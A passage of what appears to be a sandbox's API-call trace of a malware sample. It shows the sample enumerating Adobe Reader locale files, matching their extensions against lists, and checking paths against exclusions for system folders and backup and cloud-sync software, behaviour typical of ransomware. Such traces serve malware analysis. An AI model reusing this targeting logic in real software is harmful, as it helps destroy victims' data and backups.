cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="DVA.KOR", cchCount2=7) returned 3 [0058.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="DVA.KOR", cchCount2=7) returned 3 [0058.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="DVA.KOR", cchCount2=7) returned 3 [0058.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="DVA.KOR", cchCount2=7) returned 3 [0058.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="DVA.KOR", cchCount2=7) returned 3 [0058.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="DVA.KOR", cchCount2=7) returned 3 [0058.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="DVA.KOR", cchCount2=7) returned 3 [0058.499] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.KOR", cAlternateFileName="")) returned 1 [0058.499] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.499] CharUpperBuffW (in: lpsz="eBook.KOR", cchLength=0x9 | out: lpsz="EBOOK.KOR") returned 0x9 [0058.499] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82bf03e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.KOR", cAlternateFileName="")) returned 1 [0058.500] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.500] CharUpperBuffW (in: lpsz="EScript.KOR", cchLength=0xb | out: lpsz="ESCRIPT.KOR") returned 0xb [0058.500] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82bf03e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.KOR", cAlternateFileName="")) returned 1 [0058.500] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.500] CharUpperBuffW (in: lpsz="IA32.KOR", cchLength=0x8 | out: lpsz="IA32.KOR") returned 0x8 [0058.500] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db73c00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.KOR", cAlternateFileName="MAKEAC~1.KOR")) returned 1 [0058.500] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.500] CharUpperBuffW (in: lpsz="makeaccessible.KOR", cchLength=0x12 | out: lpsz="MAKEACCESSIBLE.KOR") returned 0x12 [0058.500] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.KOR", cAlternateFileName="MULTIM~1.KOR")) returned 1 [0058.500] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.500] CharUpperBuffW (in: lpsz="Multimedia.KOR", cchLength=0xe | out: lpsz="MULTIMEDIA.KOR") returned 0xe [0058.500] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da1cfa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.KOR", cAlternateFileName="")) returned 1 [0058.500] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.500] CharUpperBuffW (in: lpsz="pddom.KOR", cchLength=0x9 | out: lpsz="PDDOM.KOR") returned 0x9 [0058.500] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82bf03e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x59600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLITE.KOR", cAlternateFileName="")) returned 1 [0058.501] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.501] CharUpperBuffW (in: lpsz="PPKLITE.KOR", cchLength=0xb | out: lpsz="PPKLITE.KOR") returned 0xb [0058.501] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fafdf80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xf9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.KOR", cAlternateFileName="")) returned 1 [0058.501] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.501] CharUpperBuffW (in: lpsz="RdLang32.KOR", cchLength=0xc | out: lpsz="RDLANG32.KOR") returned 0xc [0058.501] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ee9f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.KOR", cAlternateFileName="READOU~1.KOR")) returned 1 [0058.501] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.501] CharUpperBuffW (in: lpsz="ReadOutLoud.KOR", cchLength=0xf | out: lpsz="READOUTLOUD.KOR") returned 0xf [0058.501] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da1cfa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.KOR", cAlternateFileName="")) returned 1 [0058.501] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.501] CharUpperBuffW (in: lpsz="reflow.KOR", cchLength=0xa | out: lpsz="REFLOW.KOR") returned 0xa [0058.501] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da8f3c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.KOR", cAlternateFileName="SAVEAS~1.KOR")) returned 1 [0058.501] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.501] CharUpperBuffW (in: lpsz="SaveAsRTF.KOR", cchLength=0xd | out: lpsz="SAVEASRTF.KOR") returned 0xd [0058.502] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c16540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.KOR", cAlternateFileName="")) returned 1 [0058.502] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.502] CharUpperBuffW (in: lpsz="Search.KOR", cchLength=0xa | out: lpsz="SEARCH.KOR") returned 0xa [0058.502] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82bf03e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.KOR", cAlternateFileName="")) returned 1 [0058.502] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.502] CharUpperBuffW (in: lpsz="SendMail.KOR", cchLength=0xc | out: lpsz="SENDMAIL.KOR") returned 0xc [0058.502] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.502] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.502] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.502] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.502] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.502] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.502] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.502] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.502] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.502] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.502] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.503] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.503] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.503] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.503] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.503] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.503] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.503] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.503] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.503] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.504] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.504] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.505] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.505] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.505] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.505] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.505] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.505] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.505] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.505] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.505] CharUpperBuffW (in: lpsz="\\MICROSOFT 